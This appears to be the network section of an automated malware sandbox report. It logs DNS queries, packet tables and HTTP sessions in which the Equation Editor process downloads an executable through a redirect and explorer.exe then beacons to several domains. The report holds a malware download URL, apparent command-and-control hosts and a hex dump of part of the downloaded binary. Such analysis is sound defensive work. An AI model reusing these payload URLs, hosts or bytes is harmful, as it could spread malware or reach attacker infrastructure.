                                                                                                                                                                                                        Feb 23, 2021 10:26:04.724765062 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.725297928 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.725337982 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.725373030 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.725383043 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.725424051 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.725428104 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.726588964 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.730879068 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.730917931 CET8049168103.140.251.164192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:04.731020927 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:26:05.159887075 CET4916880192.168.2.22103.140.251.164
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.805978060 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.847003937 CET8049169104.21.61.250192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.847197056 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.847470045 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.888267994 CET8049169104.21.61.250192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.275433064 CET8049169104.21.61.250192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.275492907 CET8049169104.21.61.250192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.275523901 CET8049169104.21.61.250192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.275551081 CET8049169104.21.61.250192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.276086092 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.276125908 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.276130915 CET4916980192.168.2.22104.21.61.250
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.534526110 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.771589041 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.771761894 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.771933079 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.008821964 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240080118 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240138054 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240375042 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.240487099 CET4917080192.168.2.22103.251.44.218
                                                                                                                                                                                                        Feb 23, 2021 10:27:21.478184938 CET8049170103.251.44.218192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.360548019 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.555277109 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.555417061 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.555535078 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751161098 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751426935 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751784086 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751795053 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.751866102 CET4917180192.168.2.22191.96.163.202
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.947108030 CET8049171191.96.163.202192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.840564966 CET4917280192.168.2.2252.57.196.177
                                                                                                                                                                                                        Feb 23, 2021 10:27:34.870275974 CET4917280192.168.2.2252.57.196.177
                                                                                                                                                                                                        Feb 23, 2021 10:27:40.876934052 CET4917280192.168.2.2252.57.196.177

                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.297571898 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357660055 CET5219753192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET53521978.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.863348007 CET5309953192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.942740917 CET53530998.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:09.647248030 CET5283853192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:09.710748911 CET53528388.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.720684052 CET6120053192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.798178911 CET53612008.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.293311119 CET4954853192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.533358097 CET53495488.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.285974979 CET5562753192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.359603882 CET53556278.8.8.8192.168.2.22
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.759540081 CET5600953192.168.2.228.8.8.8
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.838535070 CET53560098.8.8.8192.168.2.22

                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.297571898 CET192.168.2.228.8.8.80xd44bStandard query (0)ow.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357660055 CET192.168.2.228.8.8.80xd44bStandard query (0)ow.lyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.863348007 CET192.168.2.228.8.8.80x7c8Standard query (0)algreenstdykeghestqw.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:09.647248030 CET192.168.2.228.8.8.80x2e78Standard query (0)www.evoslancete.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.720684052 CET192.168.2.228.8.8.80x2f03Standard query (0)www.fashionwatchesstore.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.293311119 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.athara-kiano.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.285974979 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.overseaexpert.comA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.759540081 CET192.168.2.228.8.8.80xf09aStandard query (0)www.oryanomer.comA (IP address)IN (0x0001)

                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.57.56A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.183.132.164A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.120.65A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.183.131.91A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.357059002 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.62.204A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.57.56A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.183.131.91A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.183.132.164A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.120.65A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.414719105 CET8.8.8.8192.168.2.220xd44bNo error (0)ow.ly54.67.62.204A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.942740917 CET8.8.8.8192.168.2.220x7c8No error (0)algreenstdykeghestqw.dns.army103.140.251.164A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:09.710748911 CET8.8.8.8192.168.2.220x2e78Name error (3)www.evoslancete.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.798178911 CET8.8.8.8192.168.2.220x2f03No error (0)www.fashionwatchesstore.com104.21.61.250A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.798178911 CET8.8.8.8192.168.2.220x2f03No error (0)www.fashionwatchesstore.com172.67.217.64A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.533358097 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.athara-kiano.comathara-kiano.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:20.533358097 CET8.8.8.8192.168.2.220x3c4eNo error (0)athara-kiano.com103.251.44.218A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.359603882 CET8.8.8.8192.168.2.220x6ec7No error (0)www.overseaexpert.comoverseaexpert.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:26.359603882 CET8.8.8.8192.168.2.220x6ec7No error (0)overseaexpert.com191.96.163.202A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.838535070 CET8.8.8.8192.168.2.220xf09aNo error (0)www.oryanomer.comoryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.838535070 CET8.8.8.8192.168.2.220xf09aNo error (0)oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com52.57.196.177A (IP address)IN (0x0001)
                                                                                                                                                                                                        Feb 23, 2021 10:27:31.838535070 CET8.8.8.8192.168.2.220xf09aNo error (0)oryanos-env.eba-4sqpgjbe.eu-central-1.elasticbeanstalk.com18.195.132.44A (IP address)IN (0x0001)

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • ow.ly
                                                                                                                                                                                                        • algreenstdykeghestqw.dns.army
                                                                                                                                                                                                        • www.fashionwatchesstore.com
                                                                                                                                                                                                        • www.athara-kiano.com
                                                                                                                                                                                                        • www.overseaexpert.com

                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        0192.168.2.224916754.67.57.5680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.626580000 CET0OUTGET /omCE30rxT5x HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                        Host: ow.ly
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Feb 23, 2021 10:26:02.840116024 CET1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: http://algreenstdykeghestqw.dns.army/receipat/winlog.exe?platform=hootsuite
                                                                                                                                                                                                        Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: master-only
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:26:02 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        X-Pool: owly_web


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        1192.168.2.2249168103.140.251.16480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.166852951 CET2OUTGET /receipat/winlog.exe?platform=hootsuite HTTP/1.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Host: algreenstdykeghestqw.dns.army
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389307976 CET3INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:26:00 GMT
                                                                                                                                                                                                        Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                                                                        Last-Modified: Tue, 23 Feb 2021 07:55:07 GMT
                                                                                                                                                                                                        ETag: "35218-5bbfc3ca9d9e8"
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Content-Length: 217624
                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 29 81 e9 50 47 d2 e9 50 47 d2 e9 50 47 d2 2a 5f 18 d2 eb 50 47 d2 e9 50 46 d2 49 50 47 d2 2a 5f 1a d2 e6 50 47 d2 bd 73 77 d2 e3 50 47 d2 2e 56 41 d2 e8 50 47 d2 52 69 63 68 e9 50 47 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5f d7 24 5f 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 66 00 00 00 78 02 00 00 04 00 00 86 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 03 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 85 00 00 a0 00 00 00 00 80 03 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 65 00 00 00 10 00 00 00 66 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 80 13 00 00 00 80 00 00 00 14 00 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 55 02 00 00 a0 00 00 00 06 00 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 7c 09 00 00 00 80 03 00 00 0a 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1)PGPGPG*_PGPFIPG*_PGswPG.VAPGRichPGPEL_$_fx4@@D|.textef `.rdataj@@.dataXU~@.ndata.rsrc|@@
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389350891 CET5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 48 f4 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 64 82 40 00 e9 42 01 00 00 53 56 8b 35 54 f4 42 00 8d 45 a4
                                                                                                                                                                                                        Data Ascii: U\}t+}FEuHHBHPuuud@BSV5TBEWPu\@eEEPul@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389374971 CET6INData Raw: 00 e9 2a 15 00 00 8b 88 20 f5 42 00 89 88 e0 f4 42 00 e9 19 15 00 00 8b 45 e0 8d 34 85 e0 f4 42 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d e4 8b 44 85 d8 89 0e e9 03 15 00 00 ff 34 95 e0 f4 42 00 56 e9 36 14 00 00 8b 0d 10 ec 42 00 8b 35 30 82 40 00 3b
                                                                                                                                                                                                        Data Ascii: * BBE4B3;#MD4BV6B50@;tRQE$B;PQj*uP@jWF;tTj\V8F:Eu9]tBtWABWB;t=uW@uEE
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.389426947 CET7INData Raw: 11 00 00 6a 01 8b f8 89 55 c8 e8 39 11 00 00 59 3b f3 59 89 55 c8 75 08 3b f8 7c 08 7e 8c eb 12 3b f8 73 08 8b 45 e4 e9 d5 0f 00 00 0f 86 78 ff ff ff 8b 45 e8 e9 c7 0f 00 00 6a 01 e8 07 11 00 00 8b f8 6a 02 89 55 c8 89 7d 08 e8 f8 10 00 00 59 89
                                                                                                                                                                                                        Data Ascii: jU9Y;YUu;|~;sExEjjU}YUYE$t+@Z+S;tS>#3-3;;u3;t;t3G;t3E
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611238003 CET9INData Raw: 74 1f 56 e8 25 47 00 00 39 5d dc 7c 09 50 57 e8 f9 41 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 20 81 40 00 e9 8f 0a 00 00 6a 02 e8 fc 0b 00 00 50 e8 e9 45 00 00 3b c3 89 45 08 74 13 8b d8 ff 73 14 57 e8 c1 41 00 00 ff 73 18 e9 77 f5
                                                                                                                                                                                                        Data Ascii: tV%G9]|PWA;tEV @jPE;EtsWAswjMEQPjEF;EE1Pj@(@;EjFjEFuEuSuUt2EPEPh@uUtEpV&AEpWA
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611298084 CET10INData Raw: 00 56 89 95 78 ff ff ff 58 83 fe 03 75 0f 68 00 0c 00 00 57 53 ff 75 e4 e8 c2 0c 00 00 50 57 ff 75 c8 53 ff 75 88 ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 cf 00 00 00 68 19 00 02 00 e8 ee 06 00 00 6a 33 8b f8 e8 a5 06 00 00 3b
                                                                                                                                                                                                        Data Ascii: VxXuhWSuPWuSuu@u]uhj3;MEQMVQSPW@3Au.}t9Mt}uEEr639]VE,<cM\h|j;YU9]MtQVPW@SSSMSQV
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611337900 CET12INData Raw: 7c 16 ff 75 08 57 e8 6d 38 00 00 59 59 ff 75 08 ff 15 94 82 40 00 eb 30 c7 45 fc 01 00 00 00 88 1f eb 25 8b 0d b8 b8 42 00 53 23 c8 51 6a 0b ff 75 f8 ff 15 60 82 40 00 39 5d d8 74 0b 53 53 ff 75 f8 ff 15 50 82 40 00 8b 45 fc 01 05 e8 f4 42 00 33
                                                                                                                                                                                                        Data Ascii: |uWm8YYu@0E%BS#Qju`@9]tSSuP@EB3_^[e*@@@@@@@o@@@Y@@A@b@j@@@F@Y@@@2@G@Y@@@^@@c@@.@.@@@D@e@5@@
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611371994 CET13INData Raw: be 00 5c 43 00 56 e8 f6 32 00 00 56 e8 cf 2c 00 00 50 68 00 70 43 00 e8 e5 32 00 00 53 57 ff 15 e0 80 40 00 3b c3 a3 70 94 42 00 8b f0 0f 86 e8 00 00 00 a1 58 f4 42 00 8b fe f7 d8 1b c0 25 00 7e 00 00 05 00 02 00 00 3b f0 72 02 8b f8 57 68 60 14
                                                                                                                                                                                                        Data Ascii: \CV2V,PhpC2SW@;pBXB%~;rWh`By9XBu~jEh`BP-Euq}uh}Instu_}softuV}NulluMEE`BBE;XBQEuEuBEp;vEuS
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611407042 CET14INData Raw: 81 ec 84 01 00 00 53 56 57 33 db 68 01 80 00 00 89 5c 24 18 c7 44 24 10 30 a1 40 00 89 5c 24 20 c6 44 24 14 20 ff 15 b0 80 40 00 ff 15 c0 80 40 00 25 ff ff ff bf 66 3d 06 00 a3 4c f4 42 00 74 11 53 e8 89 31 00 00 3b c3 74 07 68 00 0c 00 00 ff d0
                                                                                                                                                                                                        Data Ascii: SVW3h\$D$0@\$ D$ @@%f=LBtS1;th@V1V@t8uj]1jV1jDBJ1;tjtOB@U8@S@BSD$8h`PShxBl@h@h@B,@PCPU,=PC"@B
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611449957 CET16INData Raw: 8b 36 59 85 f6 75 f2 5e c2 04 00 56 8b 35 7c 98 42 00 6a 00 e8 d7 ff ff ff 85 f6 74 1a 57 8b fe 8b 36 ff 77 08 ff 15 34 81 40 00 57 ff 15 24 81 40 00 85 f6 75 e8 5f 83 25 7c 98 42 00 00 5e c3 a1 7c 98 42 00 eb 0b 8b 48 08 3b 4c 24 04 74 0a 8b 00
                                                                                                                                                                                                        Data Ascii: 6Yu^V5|BjtW6w4@W$@u_%|B^|BH;L$tu@3Vt$Vu@,jj@(@tL$pH|B|B3^SUV5TBWj+3;tPh`C!'TBSWShL@h`C0`Cx`C
                                                                                                                                                                                                        Feb 23, 2021 10:26:03.611486912 CET17INData Raw: 0d d5 ff ff 89 3d 88 9c 42 00 6a 78 e8 9f 03 00 00 eb 30 6a 03 e8 f7 d4 ff ff 85 c0 75 25 c7 05 88 9c 42 00 01 00 00 00 eb e0 ff 74 24 30 ff 74 24 30 68 11 01 00 00 ff 35 18 ec 42 00 ff 15 60 82 40 00 ff 74 24 30 ff 74 24 30 53 e8 ed 03 00 00 e9
                                                                                                                                                                                                        Data Ascii: =Bjx0ju%Bt$0t$0h5B`@t$0t$0SPD$,|$$;BuM58@jW=HBjWBjjWBF5(BjW@jjB3@B@35B;|>u1Uvt$jUh5B`@3


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                        2192.168.2.2249169104.21.61.25080C:\Windows\explorer.exe
                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                        Feb 23, 2021 10:27:14.847470045 CET233OUTGET /nsag/?SFN=S6to9wknRE4YQNZFkHgt/L/SBo+9VyFJxmA+r1dPkJtX1rvSVI6t0SymKIjP48fhKDCKWg==&cBb=LtD0g HTTP/1.1
                                                                                                                                                                                                        Host: www.fashionwatchesstore.com
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                        Feb 23, 2021 10:27:15.275433064 CET234INHTTP/1.1 401.1 Unauthorized
                                                                                                                                                                                                        Date: Tue, 23 Feb 2021 09:27:15 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Set-Cookie: __cfduid=d3952bf084d888117c82a1d2dca71090e1614072434; expires=Thu, 25-Mar-21 09:27:14 GMT; path=/; domain=.fashionwatchesstore.com; HttpOnly; SameSite=Lax
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        cf-request-id: 086fcfe8bf00004e138929f000000001
                                                                                                                                                                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1hpP4drIbnTPup7R%2BneVNCvn3ziHhYEXy7Bfs5HWyLnKg3AuVrK25htuzaIQ5yjDZzGHpeOeu%2BasfhUsOTaLLpPnHmavrF9L7rSfcWPR4kjZaxJXalXOfrRBmnE%3D"}],"max_age":604800}
                                                                                                                                                                                                        NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 625fe8edf9f54e13-FRA
